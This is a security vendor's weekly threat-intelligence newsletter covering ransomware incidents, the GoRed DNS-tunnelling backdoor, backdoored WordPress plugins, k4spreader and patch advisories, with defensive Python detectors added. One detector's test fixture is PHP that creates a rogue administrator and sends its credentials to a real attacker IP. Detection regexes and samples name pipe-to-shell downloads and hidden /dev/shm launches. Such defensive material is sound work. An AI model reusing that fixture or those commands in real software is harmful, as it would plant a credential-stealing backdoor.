
Vercara’s Open-Source Intelligence (OSINT) Report – June 21 – June 27, 2024

Here is your weekly summary of news and other public coverage relevant to Vercara, the market leader in DNS, DDoS Mitigation, Web Application Firewalls, and Bot Management. Keep reading to learn about the week’s interesting and informative stories.

NOTE: Except where indicated, this report is released as TLP: CLEAR and items in it may be shared but not attributed to Vercara. For more information on the Traffic Light Protocol, the definitions and usage are at https://www.first.org/tlp/.

CDK Global outage caused by BlackSuit ransomware attack.  

(TLP: CLEAR) The BlackSuit ransomware gang is responsible for a significant IT outage at CDK Global, disrupting car dealerships across North America. CDK Global, a software-as-a-service provider for car dealership operations, is negotiating with the gang to obtain a decryptor and prevent data leaks. The attack led CDK to shut down its IT systems twice, causing dealerships to resort to manual operations. Major dealerships like Penske Automotive Group and Sonic Automotive have reported disruptions due to the attack. CDK also warns of threat actors posing as CDK agents to gain unauthorized access. BlackSuit, launched in May 2023, is believed to be a rebrand of the Royal ransomware operation, which succeeded the notorious Conti cybercrime syndicate. The Royal ransomware gang, linked to over 350 attacks and $275 million in ransom demands, was identified by the FBI and CISA as using similar tactics and coding overlaps with BlackSuit. 

(TLP: CLEAR) Comments: BlackSuit is a comparatively young brand run by experienced operators: it first appeared in May 2023 and is believed to be a rebrand of Royal, itself the successor to the Conti syndicate, and the FBI and CISA have noted shared tactics and code overlap between Royal and BlackSuit. Like its predecessors, BlackSuit runs double-extortion campaigns against high-value organizations: it gains initial access by exploiting vulnerable Internet-facing systems and through social engineering such as phishing, exfiltrates data, and only then deploys its ransomware, so that victims are pressured both to recover their systems and to prevent a leak. The CDK incident also shows how a single SaaS provider can become a choke point for an entire industry. Organizations that depend on such a provider should keep tested manual fallback procedures and be alert to follow-on social engineering that impersonates the provider’s support staff, which CDK has already warned its customers about.  

(TLP: CLEAR) Recommended best practices/regulations: NIST SP 800-53 Rev5 SI-3: “MALICIOUS CODE PROTECTION” 

“Control:   

“a. Implement [Selection (one or more): signature-based; non-signature based] malicious code protection mechanisms at system entry and exit points to detect and eradicate malicious code;   

“b. Automatically update malicious code protection mechanisms as new releases are available in accordance with organizational configuration management policy and procedures;   

“c. Configure malicious code protection mechanisms to: 1. Perform periodic scans of the system [Assignment: organization-defined frequency] and real-time scans of files from external sources at [Selection (one or more): endpoint; network entry and exit points] as the files are downloaded, opened, or executed in accordance with organizational policy; and 2. [Selection (one or more): block malicious code; quarantine malicious code; take [Assignment: organization-defined action]]; and send alert to [Assignment: organization defined personnel or roles] in response to malicious code detection; and   

“d. Address the receipt of false positives during malicious code detection and eradication and the resulting potential impact on the availability of the system.”  

NIST requires malware detection and prevention solutions. This can be on the device, as with anti-virus agents, but also can be augmented by Protective DNS provided by the network that the device is on or across the Internet. This provides defence-in-depth and support for devices such as Internet of Things (IoT) or some servers that cannot run an endpoint client. 

(TLP: CLEAR) Vercara: Vercara’s Protective DNS solution, UltraDDR (DNS Detection and Response), uses a multi-petabyte data lake filled with DNS query history and indicators of compromise from multiple Cyber Threat Intelligence (CTI) data feeds to correlate an incoming DNS query in real-time with previously observed malicious activity. This ensures that users and devices only go to safe, policy-compliant Internet locations. 

Source: https://www.bleepingcomputer.com/news/security/cdk-global-outage-caused-by-blacksuit-ransomware-attack/  

Change Healthcare lists the medical data stolen in ransomware attack. 

(TLP: CLEAR) UnitedHealth confirmed the types of data stolen in the Change Healthcare ransomware attack, stating that breach notifications will be mailed in July. The attack exposed a vast amount of data, affecting possibly a third of Americans, as per CEO Andrew Witty. Stolen data includes health insurance details, medical records, billing information, and personal identifiers like Social Security numbers. Change Healthcare clarified that data exposure varies per individual and complete medical histories were not stolen. They are notifying affected individuals and offering two years of free credit monitoring and identity theft protection. Impacted individuals can visit changecybersupport.com for more information. The breach stems from a February attack where the BlackCat ransomware gang stole 6 TB of data, causing significant disruptions in the US healthcare system. UnitedHealth paid a $22 million ransom, which was later mishandled by the BlackCat gang, leading to further ransom demands. The breach has cost UnitedHealth $872 million as of April, with further costs expected. 

(TLP: CLEAR) Comments: Healthcare remains a lucrative target because of the volume of sensitive data held by providers and clearinghouses and because disruption to care creates pressure to pay quickly; stolen records can also be sold on dark-web markets or used directly for identity and insurance fraud. BlackCat (also known as ALPHV) emerged in late 2021 as a Ransomware-as-a-Service (RaaS) operation and was among the first major ransomware families written in Rust, which complicated analysis and signature-based detection when it appeared and made it straightforward to build payloads for both Windows and Linux/ESXi hosts. BlackCat targets a wide range of industries (healthcare, education, and critical infrastructure) and practises double extortion: one demand for the decryptor and a second for not publishing the stolen data. The Change Healthcare case also shows that paying does not settle the matter: the $22 million payment was mishandled within the BlackCat operation and a further ransom demand followed.  

(TLP: CLEAR) Recommended best practices/regulations: Department of Health and Human Services Fact Sheet: Ransomware and The Health Information Portability and Accountability Act (HIPAA): “The HIPAA Security Rule requires implementation of security measures that can help prevent the introduction of malware, including ransomware. Some of these required security measures include:  

“implementing a security management process, which includes conducting a risk analysis to identify threats and vulnerabilities to electronic protected health information (ePHI) and implementing security measures to mitigate or remediate those identified risks;  

“implementing procedures to guard against and detect malicious software;  

“training users on malicious software protection so they can assist in detecting malicious software and know how to report such detections; and  

“implementing access controls to limit access to ePHI to only those persons or software programs requiring access.” 

(TLP: CLEAR) Vercara: Vercara’s Protective DNS solution, UltraDDR (DNS Detection and Response), can detect and block malware delivery and command and control (C2) techniques such as phishing, domain generation algorithms, and DNS tunnelling to reduce both the quantity and impact of infections. 

Source: https://www.bleepingcomputer.com/news/security/change-healthcare-lists-the-medical-data-stolen-in-ransomware-attack/  

GoRed using DNS & ICMP tunnelling for C2 server communication.  

(TLP: CLEAR) Threat actors frequently abuse DNS and ICMP tunnelling to covertly transmit data and bypass network security measures. These protocols are often inadequately blocked by firewalls and can be manipulated to create hidden communication channels for transferring sensitive data or establishing unauthorized access points, allowing threat actors to maintain persistence and avoid detection in compromised networks. Positive Technologies researchers discovered that ExCobalt, a cybercriminal group linked to the notorious Cobalt gang, is using a new tool called GoRed for command-and-control (C2) server communication via DNS and ICMP tunnelling. GoRed, a Go-based backdoor, features a C2 framework for executing commands, credential harvesting, data collection, reconnaissance, data serialization, encryption, archiving, and exfiltration to a dedicated server. GoRed employs multiple communication protocols, including DNS/ICMP tunnelling, WebSocket Secure (WSS), and QUIC. The tool was identified during an incident investigation in March 2024 on a Linux host, with previous sightings in client incidents in July and October 2023. ExCobalt’s C2 servers and domains, such as leo.rpm-bin.link and sula.rpm-bin.link, facilitate communication with compromised systems. GoRed’s control flow relies on command-line interface (CLI) commands to gain system persistence, initialize beacon activities, and monitor the file system. The C2 communication uses an RPC protocol with custom CBOR serialization and AES-256-GCM encryption, so the payload cannot be read or altered by devices inspecting the traffic in transit. ExCobalt continues to enhance GoRed with new features to improve data collection, maintain secrecy, and exploit vulnerabilities, indicating ongoing advancements in their cyber espionage capabilities. 

(TLP: CLEAR) Comments: Tunnelling over DNS and other always-allowed protocols is a long-standing way for malware to hide its C2 traffic, because those protocols are rarely blocked at the perimeter and are seldom inspected. MITRE ATT&CK catalogues DNS-based C2 as T1071.004, “Application Layer Protocol: DNS” (https://attack.mitre.org/techniques/T1071/004/), and ICMP-based C2 under T1095, “Non-Application Layer Protocol”. Organizations should block direct outbound DNS (UDP/TCP 53, plus DNS over TLS on 853 and DNS over HTTPS to known public resolver endpoints), ICMP, and other protocols commonly used for tunnelling from end-user and server subnets, and permit outbound DNS only from their on-network resolvers, which in turn forward to a protective resolver where queries can be logged and filtered. A good resource and process for doing this is described in the CISA Encrypted DNS Implementation Guidance at https://www.cisa.gov/resources-tools/resources/encrypted-dns-implementation-guidance 

(TLP: CLEAR) Recommended best practices/regulations: NIST Cybersecurity Framework (CSF) DE.CM-01: “Networks and network services are monitored to find potentially adverse events.” One of the ways to detect phishing, malware droppers, and command and control (C2) is at the network level. Intrusion Detection Systems (IDS), Intrusion Prevention Systems (IPS), and next-generation firewalls can be used together with a protective DNS solution to detect these malicious activities as they traverse the network, even if the initial infection occurred via physical media or on another network such as a hotel or airport. 
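The two network-level controls discussed above (restricting outbound DNS to the on-network resolvers, and monitoring DNS for tunnelling) can be checked against resolver or firewall logs. The following is an added example written for this report; it is not code from Positive Technologies, Vercara or the GoRed analysis. It assumes a log format of one query per line (timestamp, client IP, resolver IP, query name, query type), uses a constructed sample log in which the rpm-bin.link names from the report carry made-up hex labels, and treats 10.0.0.53 as the only approved resolver; the thresholds are starting points to tune, not published indicators.

```python
"""Heuristic detection of DNS tunnelling and resolver bypass over sample log lines.

Added example for this report, not code from Positive Technologies, Vercara or the
GoRed analysis. Assumed log format, one query per line:
    <timestamp> <client_ip> <resolver_ip> <qname> <qtype>
"""
import math
from collections import defaultdict

# Assumption: the organization's on-network resolvers; anything else is a bypass.
APPROVED_RESOLVERS = {"10.0.0.53"}

# Constructed sample log. rpm-bin.link is the C2 domain named in the report; the
# 40-character hex labels are made-up stand-ins for encoded tunnel data, and
# 203.0.113.53 (TEST-NET-3) stands in for an external resolver.
SAMPLE_LOG = """\
2024-06-24T10:00:01Z 10.0.0.5 10.0.0.53 www.example.com A
2024-06-24T10:00:02Z 10.0.0.5 10.0.0.53 mail.example.com MX
2024-06-24T10:00:03Z 10.0.0.7 10.0.0.53 a9f3c2e17b4d6e0f9a1b2c3d4e5f60718293a4b5.leo.rpm-bin.link TXT
2024-06-24T10:00:04Z 10.0.0.7 10.0.0.53 0c1d2e3f4a5b6c7d8e9f0a1b2c3d4e5f60718293.leo.rpm-bin.link TXT
2024-06-24T10:00:05Z 10.0.0.7 10.0.0.53 ffee00112233445566778899aabbccddeeff0011.leo.rpm-bin.link TXT
2024-06-24T10:00:06Z 10.0.0.7 10.0.0.53 9988776655443322110ffeeddccbbaa998877665.sula.rpm-bin.link TXT
2024-06-24T10:00:07Z 10.0.0.5 10.0.0.53 cdn.example.com A
2024-06-24T10:00:08Z 10.0.0.9 203.0.113.53 update.example.org A
"""


def shannon_entropy(s):
    """Bits per character: encoded data scores high, dictionary-like labels low."""
    if not s:
        return 0.0
    n = len(s)
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def registered_domain(qname):
    """Last two labels. A real deployment should use the public suffix list instead."""
    labels = qname.rstrip(".").split(".")
    return ".".join(labels[-2:])


def parse_log(text):
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue  # skip malformed lines rather than fail on them
        ts, client, resolver, qname, qtype = parts
        yield ts, client, resolver, qname.lower(), qtype.upper()


def rogue_resolver_clients(text, approved=APPROVED_RESOLVERS):
    """Hosts sending DNS anywhere other than the approved resolvers (bypass or tunnel)."""
    seen = defaultdict(set)
    for _, client, resolver, _, _ in parse_log(text):
        if resolver not in approved:
            seen[client].add(resolver)
    return {client: sorted(resolvers) for client, resolvers in seen.items()}


def tunnelling_candidates(text, min_queries=3, long_label=30, high_entropy=3.2, ratio=0.5):
    """Registered domains whose queries look like encoded data rather than hostnames."""
    stats = defaultdict(lambda: {"n": 0, "names": set(), "long": 0, "entropy": 0, "bulk": 0})
    for _, _, _, qname, qtype in parse_log(text):
        s = stats[registered_domain(qname)]
        leftmost = qname.split(".")[0]
        s["n"] += 1
        s["names"].add(qname)
        if len(leftmost) >= long_label:
            s["long"] += 1
        if shannon_entropy(leftmost) >= high_entropy:
            s["entropy"] += 1
        if qtype in ("TXT", "NULL"):  # record types that carry the most payload per answer
            s["bulk"] += 1
    flagged = {}
    for domain, s in stats.items():
        if s["n"] < min_queries:
            continue
        reasons = []
        if s["long"] / s["n"] >= ratio:
            reasons.append("long leftmost labels")
        if s["entropy"] / s["n"] >= ratio:
            reasons.append("high-entropy labels")
        if s["bulk"] / s["n"] >= ratio:
            reasons.append("TXT/NULL-heavy")
        if len(s["names"]) / s["n"] >= 0.9:
            reasons.append("almost no repeated names")
        if len(reasons) >= 2:  # a single signal alone is common for CDNs and telemetry
            flagged[domain] = reasons
    return flagged


if __name__ == "__main__":
    for domain, why in tunnelling_candidates(SAMPLE_LOG).items():
        print(f"possible tunnelling via {domain}: {', '.join(why)}")
    for client, resolvers in rogue_resolver_clients(SAMPLE_LOG).items():
        print(f"{client} sends DNS to non-approved resolver(s): {', '.join(resolvers)}")
```

Run against the sample, the rpm-bin.link traffic is flagged on all four signals while example.com is not (its names are unique but short and low-entropy), and 10.0.0.9 is reported for talking to a resolver outside the approved set. Requiring two independent signals before flagging keeps CDN and telemetry domains, which also generate many unique names, out of the alert queue.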

(TLP: CLEAR) Vercara: Vercara’s Protective DNS solution, UltraDDR (DNS Detection and Response), enforces malware filtering as a network service using 4 distinct malware detection engines, including a dynamic decision engine that compares domain details, DNS query details, query answers, and other data points to determine if a domain is malicious before endpoints can be infected by them. 

Source: https://cybersecuritynews.com/gored-dns-icmp-tunneling-c2-communication/  

Multiple WordPress plugins compromised: Hackers create rogue admin accounts. 

(TLP: CLEAR) Multiple WordPress plugins have been backdoored to inject malicious code that makes it possible to create rogue administrator accounts with the aim of performing arbitrary actions. 

“The injected malware attempts to create a new administrative user account and then sends those details back to the attacker-controlled server,” Wordfence security researcher Chloe Chamberland said in a Monday alert. “In addition, it appears the threat actor also injected malicious JavaScript into the footer of websites that appears to add SEO spam throughout the website.” 

The admin accounts have the usernames “Options” and “PluginAuth,” with the account information exfiltrated to the IP address 94[.]156[.]79[.]8. It’s currently not known how the unknown attackers behind the campaign managed to compromise the plugins, but the earliest signs of the software supply chain attack date back to June 21, 2024. The plugins in question are no longer available for download from the WordPress plugin directory pending ongoing review – 

  • Social Warfare 4.4.6.4 – 4.4.7.1 (Patched version: 4.4.7.3) – 30,000+ installs 
  • Blaze Widget 2.2.5 – 2.5.2 (Patched version: N/A) – 10+ installs 
  • Wrapper Link Element 1.0.2 – 1.0.3 (Patched version: N/A) – 1,000+ installs 
  • Contact Form 7 Multi-Step Addon 1.0.4 – 1.0.5 (Patched version: N/A) – 700+ installs 
  • Simply Show Hooks 1.2.1 (Patched version: N/A) – 4,000+ installs 

Users of the plugins are advised to inspect their sites for suspicious administrator accounts and delete them, in addition to removing any malicious code. 

(TLP: CLEAR) Comments: This is a software supply-chain compromise rather than a flaw in the affected sites themselves: the attackers modified the plugins at the source, so every site that installed or auto-updated to a backdoored version ran the malicious code with the plugin’s full privileges. Code running inside WordPress can create a perfectly valid administrator account through the normal API, so the event does not look like a break-in in web server logs and is easy to miss in a routine log review. Organizations should therefore alert on administrator-account creation and role changes in real time rather than rely only on periodic log reviews, keep an inventory of installed plugin versions, and compare installed plugin files against a fresh copy from the WordPress.org directory whenever a compromise like this is reported.  
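A site owner responding to the alert above needs a quick way to check installed plugin code for the indicators it gives. The following is an added example for this report; it is not Wordfence’s, WordPress.org’s or any plugin’s code. The IP address and the two usernames are the indicators quoted in the story; the function-name heuristic (user creation, administrator role and an outbound request in the same file) is this example’s own assumption about what a rogue-admin backdoor has to call, and the two plugin snippets it scans are constructed fixtures, not the real injected code.

```python
"""Scan WordPress plugin files for the indicators described in the Wordfence alert.

Added example; not Wordfence's, WordPress.org's or any plugin's code. The IP and
usernames come from the report; the call-combination heuristic is an assumption.
"""
import re
import tempfile
from pathlib import Path

# Indicators quoted in the report (tuples, so findings come out in a fixed order).
IOC_IPS = ("94.156.79.8",)
IOC_USERNAMES = ("Options", "PluginAuth")

# Assumption: a rogue-admin backdoor must create a user, make it an administrator,
# and send the credentials somewhere. Each call alone is legitimate; together they are not.
USER_CREATE = re.compile(r"\b(wp_create_user|wp_insert_user)\s*\(")
ADMIN_ROLE = re.compile(r"(set_role\s*\(\s*|['\"]role['\"]\s*=>\s*)['\"]administrator['\"]")
OUTBOUND = re.compile(r"\b(wp_remote_(post|get|request)|curl_init|file_get_contents)\s*\(")
OBFUSCATION = re.compile(r"\b(eval|base64_decode|gzinflate|str_rot13)\s*\(")

# Constructed fixtures: a harmless plugin and a stand-in for the described backdoor.
BENIGN_PLUGIN = """<?php
/* constructed benign plugin: registers a shortcode and nothing else */
add_shortcode('hello', function () { return esc_html__('Hello', 'hello'); });
"""
INJECTED_PLUGIN = """<?php
/* constructed stand-in for the injected code the alert describes; not the real sample */
$login = 'PluginAuth';
$pass  = wp_generate_password(16);
$id = wp_insert_user(['user_login' => $login, 'user_pass' => $pass, 'role' => 'administrator']);
wp_remote_post('http://94.156.79.8/', ['body' => ['u' => $login, 'p' => $pass]]);
"""


def scan_source(src):
    """Return a list of human-readable findings for one PHP source string."""
    findings = []
    for ip in IOC_IPS:
        if ip in src:
            findings.append(f"contains known exfiltration address {ip}")
    for user in IOC_USERNAMES:
        if re.search(rf"['\"]{re.escape(user)}['\"]", src):
            findings.append(f"contains known rogue username {user!r}")
    if USER_CREATE.search(src) and ADMIN_ROLE.search(src) and OUTBOUND.search(src):
        findings.append("creates a user, grants administrator, and makes an outbound request")
    if OBFUSCATION.search(src):
        findings.append("uses eval/decoding primitives common in injected code")
    return findings


def scan_plugins(plugins_dir):
    """Scan every .php file under wp-content/plugins and report the files with findings."""
    root = Path(plugins_dir)
    report = {}
    for php in sorted(root.rglob("*.php")):
        findings = scan_source(php.read_text(errors="ignore"))
        if findings:
            report[php.relative_to(root).as_posix()] = findings
    return report


def demo():
    """Write the two fixtures into a throwaway plugin directory and scan it."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "example-plugin").mkdir()
        (root / "example-plugin" / "example-plugin.php").write_text(BENIGN_PLUGIN)
        (root / "compromised-plugin").mkdir()
        (root / "compromised-plugin" / "compromised-plugin.php").write_text(INJECTED_PLUGIN)
        return scan_plugins(root)


if __name__ == "__main__":
    for path, findings in demo().items():
        print(path)
        for f in findings:
            print("  -", f)
```

Point `scan_plugins()` at a real `wp-content/plugins` directory to run it for real. It complements, rather than replaces, the checks the alert calls for: list administrators with `wp user list --role=administrator --fields=ID,user_login,user_registered` and remove any you did not create, and run `wp plugin verify-checksums --all` to compare installed plugin files against the WordPress.org copies.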

(TLP: CLEAR) Recommended best practices/regulations: OWASP Web Application Firewall: “A ‘web application firewall (WAF)’ is an application firewall for HTTP applications. It applies a set of rules to an HTTP conversation. Generally, these rules cover common attacks such as Cross-site Scripting (XSS) and SQL Injection.  

“While proxies generally protect clients, WAFs protect servers. A WAF is deployed to protect a specific web application or set of web applications. A WAF can be considered a reverse proxy.  

“WAFs may come in the form of an appliance, server plugin, or filter and may be customized to an application. The effort to perform this customization can be significant and needs to be maintained as the application is modified.” 

(TLP: CLEAR) Vercara: Vercara’s Web Application Firewall, UltraWAF, can provide you with protection in the way that you need it. UltraWAF allows security postures that assume that all traffic is allowed – except an already identified threat or an attack (negative security) – or zero trust models where all traffic is denied unless explicitly permitted (positive security). 

Source: https://thehackernews.com/2024/06/multiple-wordpress-plugins-compromised.html  

Hackers using k4spreader tool to install DDoS botnet and miners. 

(TLP: CLEAR) A new ELF malware tool named k4spreader, developed by the Chinese “8220” (Water Sigbin) mining gang, was discovered in June 2024. Written in Cgo and packed with a modified UPX packer, k4spreader installs other malware such as the Tsunami DDoS botnet and PwnRig cryptominer. The tool shows persistence, self-update, and download functionalities and has been spreading through vulnerabilities like CVE-2020-14882, JBoss_AS_3456_RCE, and YARN_API_RCE. 

Key Details: 

  • Variants and Development: Three variants of k4spreader have been observed, indicating that it is still under active development. The latest version (v3) adds operational logging and runtime port detection. 
  • Persistence Methods: K4spreader achieves system persistence through three methods: 
  1. Modifying the user’s bash startup file to execute a copied program. 
  2. Creating a system service script to run the program in the background. 
  3. Creating a systemd service file for the same purpose. 
  • Malicious Payloads: It hides malicious programs like Tsunami and PwnRig within its data. Tsunami is an IRC bot used for DDoS attacks, and PwnRig is a Monero cryptocurrency miner. 
  • Control Servers: Passive DNS analysis revealed that the C&C servers associated with k4spreader also handle traffic from other shell scripts and mining pools related to the “8220” group. The most active servers include dw.c4kdeliver.top, run.sck-dns.ws, and another unnamed server. 
  • Anti-Detection and Maintenance: The malware can disable firewalls, flush iptables rules, clear suspicious processes, remove malicious cron jobs, and log its operations. 

K4spreader is an advanced and evolving malware tool used by the “8220” mining gang to distribute additional malicious software and maintain persistence on infected systems. It exploits known vulnerabilities and employs sophisticated evasion techniques to avoid detection and maintain control over compromised machines. System administrators should be vigilant and monitor for suspicious activities related to this malware. 
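The three persistence methods listed above (shell startup file, init-style service script, systemd unit) are all plain text files that an administrator can audit. The following is an added example for this report, not code from the k4spreader analysis or from Vercara. It checks those locations for commands started from places a packaged service would not use, for download-and-pipe-to-shell constructs, and for detached background launches; the path list, patterns and the three sample files it scans are this example’s own constructed assumptions, and the file names in them are invented.

```python
"""Audit Linux persistence locations for the patterns k4spreader is reported to use.

Added example for this report; not code from the k4spreader analysis or Vercara.
The directory list, regexes and sample files below are this example's assumptions.
"""
import re
from pathlib import Path

# Assumption: packaged services do not start binaries from scratch dirs or hidden dirs.
TEMP_DIRS = re.compile(r"^(/tmp|/var/tmp|/dev/shm)(/|$)")
HIDDEN_DIR = re.compile(r"/\.[^/\s]+/")
ABS_PATH = re.compile(r"(?<![\w.$-])(/[\w./-]+)")
PIPE_TO_SHELL = re.compile(r"\b(curl|wget|base64\s+-d)\b.*\|\s*(ba|da|z)?sh\b")
BACKGROUND = re.compile(r"\b(nohup|setsid)\b|&\s*(;;|\))?\s*$")
EXEC_LINE = re.compile(r"^Exec(Start|StartPre|StartPost)=")

# Constructed samples; the paths are invented stand-ins for a copied malware binary.
BASHRC_SAMPLE = """\
# ~/.bashrc (constructed sample)
export PATH="$HOME/bin:$PATH"
alias ll='ls -alF'
nohup /dev/shm/.cache/update >/dev/null 2>&1 &
"""
INIT_SCRIPT_SAMPLE = """\
#!/bin/sh
### BEGIN INIT INFO
# Provides: sysupdate
### END INIT INFO
case "$1" in
  start) /var/tmp/.sys/sysupdate & ;;
esac
"""
UNIT_SAMPLE = """\
[Unit]
Description=System Update Service

[Service]
ExecStart=/usr/local/lib/.cache/sysupdate
Restart=always

[Install]
WantedBy=multi-user.target
"""


def suspicious_path(path):
    """True for scratch directories and any hidden directory component."""
    return bool(TEMP_DIRS.match(path) or HIDDEN_DIR.search(path))


def audit_shell_startup(text):
    """Check a shell rc file or init script; returns (line_no, line, reasons) tuples."""
    hits = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        why = []
        if PIPE_TO_SHELL.search(line):
            why.append("downloads or decodes content and pipes it to a shell")
        if BACKGROUND.search(line):
            why.append("starts a detached background process")
        for path in ABS_PATH.findall(line):
            if suspicious_path(path):
                why.append(f"runs from unusual location {path}")
                break
        if why:
            hits.append((n, line, why))
    return hits


def audit_systemd_unit(text):
    """Check the Exec* lines of a systemd unit; returns a list of reasons."""
    why = []
    for raw in text.splitlines():
        line = raw.strip()
        if not EXEC_LINE.match(line):
            continue
        cmd = line.split("=", 1)[1].strip().lstrip("-@+!:")  # strip systemd exec prefixes
        for path in ABS_PATH.findall(cmd):
            if suspicious_path(path):
                why.append(f"ExecStart runs from unusual location {path}")
        if PIPE_TO_SHELL.search(cmd):
            why.append("ExecStart downloads or decodes content and pipes it to a shell")
    return why


def audit_host():
    """Run both checks against the usual persistence locations on this host."""
    results = {}
    rc_files = [Path.home() / ".bashrc", Path.home() / ".profile", Path("/etc/rc.local")]
    rc_files += list(Path("/etc/init.d").glob("*"))
    for rc in rc_files:
        if rc.is_file():
            hits = audit_shell_startup(rc.read_text(errors="ignore"))
            if hits:
                results[str(rc)] = hits
    for unit in Path("/etc/systemd/system").glob("*.service"):
        why = audit_systemd_unit(unit.read_text(errors="ignore"))
        if why:
            results[str(unit)] = why
    return results


if __name__ == "__main__":
    print("bashrc:", audit_shell_startup(BASHRC_SAMPLE))
    print("init script:", audit_shell_startup(INIT_SCRIPT_SAMPLE))
    print("unit:", audit_systemd_unit(UNIT_SAMPLE))
```

The hidden-directory rule will also flag legitimate user tooling sourced from dotfiles (shell version managers, for instance), so treat the output as a review list and add an allowlist for your environment; the point is that a freshly appeared unit or rc line launching something from /tmp, /var/tmp, /dev/shm or a dot-directory deserves a look, and the same check belongs in your configuration-drift monitoring so it runs continuously rather than once.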

(TLP: CLEAR) Comments: k4spreader is an installer and updater for the “8220” gang’s existing toolset rather than a new payload in its own right. It gains a foothold through known, unpatched vulnerabilities in Internet-facing services (the Oracle WebLogic flaw CVE-2020-14882 and the JBoss and Hadoop YARN issues named above), establishes persistence in three different ways, disables host firewalls, and then drops the Tsunami IRC DDoS bot and the PwnRig Monero miner. The gang’s motive is financial (mining revenue and DDoS capacity), so the usual signs of infection are unexplained CPU load, newly created systemd units or init scripts, and outbound IRC or mining-pool traffic; patching the exploited services removes the initial access vector entirely. 

(TLP: CLEAR) Recommended best practices/regulations: NIST Cybersecurity Framework (CSF) PR.PS-05: “Installation and execution of unauthorized software are prevented”. By enforcing a content filtering policy to block typical software download sites in addition to hacker tools and P2P services, organizations reduce the amount of malware and trojan horses that are introduced into their organization unknowingly by their users. This can be done via a protective DNS or forward web proxy solution with website categories feeds. 

NIST Cybersecurity Framework (CSF) PR.IR-04: “Adequate resource capacity to ensure availability is maintained.”  Because botnets such as Tsunami exist to launch DDoS attacks, businesses should maintain constant vigilance and regularly test and enhance their DDoS mitigation strategies, architecture, monitoring, and procedures. 

(TLP: CLEAR) Vercara: Vercara’s Protective DNS solution, UltraDDR (DNS Detection and Response), uses Cyber Threat Intelligence feeds, domain categories, and other detection engines to assess DNS queries in real-time and block domains that are being used for phishing, malware delivery, and malware Command and Control (C2). This reduces the quantity and impact of malware infections.  

Source: https://cybersecuritynews.com/hackers-k4spreader-ddos-botnet-miners/  

New MOVEit Auth Bypass vulnerability under attack now, patch immediately. 

(TLP: CLEAR) Progress Software’s MOVEit Transfer and MOVEit Cloud-managed file transfer solutions contain a critical authentication bypass vulnerability identified as CVE-2024-5806. This vulnerability, located in the SFTP module, allows attackers to bypass authentication and access sensitive data without proper credentials. Researchers at watchTowr discovered the flaw and published a detailed analysis, revealing that manipulating certain parameters during the SSH authentication process can trick the system into granting access. 

Key Points: 

  • Vulnerability Discovery and Exploit Release: The vulnerability was disclosed by watchTowr, and exploit code was publicly released shortly after Progress Software issued a security bulletin. This led to a surge in attack attempts on vulnerable MOVEit installations. 
  • Historical Context: Last year, MOVEit Transfer was targeted by the Cl0p ransomware group using a zero-day SQL injection vulnerability, affecting numerous organizations and compromising sensitive data. 
  • Patches and Recommendations: Progress Software has fixed the flaw in MOVEit Transfer 2024.0.2, 2023.1.6 and 2023.0.11, and in MOVEit Gateway 2024.0.1 and later. All customers are strongly advised to upgrade immediately. 
  • Confirmation and Urgency: Researchers at Rapid7 confirmed the exploit and achieved authentication bypass on unpatched versions. Security professionals urge organizations to prioritize this vulnerability, apply vendor-provided updates promptly, and refer to Progress Software’s security bulletin for detailed patching instructions. 

The CVE-2024-5806 vulnerability in MOVEit products is a critical issue that requires immediate attention. Organizations using MOVEit Transfer or MOVEit Cloud should apply the necessary patches without delay to prevent unauthorized access and potential data breaches. 

(TLP: CLEAR) Comments: This is the second critical vulnerability identified in the MOVEit software within roughly a year. In June 2023, a zero-day SQL injection vulnerability (CVE-2023-34362) allowed malicious actors to execute code remotely on affected systems, which led to significant data breaches at over 2,000 organizations and affected more than 60 million individuals globally. Managed file transfer servers are exposed to the Internet by design and hold exactly the data attackers want, so beyond applying the fix, organizations should restrict who can reach the SFTP service where their business allows it and review authentication logs for the window between public disclosure and patching, since exploit code was circulating within days. 

(TLP: CLEAR) Recommended best practices/regulations: NIST Cybersecurity Framework (CSF) PR.PS-05: “Installation and execution of unauthorized software are prevented”  

By enforcing a content filtering policy to block typical software download sites in addition to hacker tools and P2P services, organizations reduce the amount of malware and trojan horses that are introduced into their organization unknowingly by their users. This can be done via a protective DNS or forward web proxy solution with website category feeds. 

(TLP: CLEAR) Vercara: Vercara’s Protective DNS solution, UltraDDR (DNS Detection and Response), enforces malware filtering as a network service using 4 distinct malware detection engines, including a dynamic decision engine that compares domain details, DNS query details, query answers, and other data points to determine if a domain is malicious before endpoints can be infected by them. 

Source: https://cybersecuritynews.com/moveit-auth-bypass-vulnerability/  

WordPress releases urgent security update to patch XSS and Path Traversal Flaws. 

(TLP: CLEAR) WordPress has released an urgent security update, version 6.5.5, to address critical vulnerabilities that could compromise the security of millions of websites. This minor release includes three bug fixes and is highly recommended for immediate installation to ensure site security and stability. 

Key Security Fixes in WordPress 6.5.5: 

  • Cross-Site Scripting (XSS) Vulnerability in HTML API: 
      • Reported by Dennis Snell, Alex Concha, and Grzegorz Ziółkowski of the WordPress security team. 
      • This vulnerability could allow attackers to inject malicious scripts into web pages viewed by other users. 
  • Cross-Site Scripting (XSS) Vulnerability in Template Part Block: 
      • Independently reported by Rafie Muhammad of Patchstack and identified during a third-party security audit. 
      • This flaw could enable attackers to execute arbitrary scripts in the context of the user’s session. 
  • Path Traversal Issue on Windows-Hosted Sites: 
      • Reported by Rafie M & Edouard L of Patchstack, David Fifield, x89, apple502j, and mishre. 
      • This vulnerability could allow attackers to access restricted directories and files on the server, potentially leading to data breaches or further exploitation. 

Update Instructions: 

  • Download from WordPress.org: Visit the official WordPress website to download the latest version. 
  • Update via WordPress Dashboard: Navigate to the Dashboard, click on “Updates,” and then click “Update Now.” 
  • Automatic Background Updates: For sites that support automatic updates, the process will begin automatically. 

Given the severity of these vulnerabilities, it is crucial for all WordPress site administrators to update their installations immediately. Delaying updates can expose sites to potential attacks, leading to data loss, unauthorized access, and other security breaches. WordPress 6.5.5 is a short-cycle release, with the next major release, version 6.6, scheduled for July 16, 2024. This upcoming release is expected to bring significant improvements and new features, enhancing the platform’s functionality and user experience. 

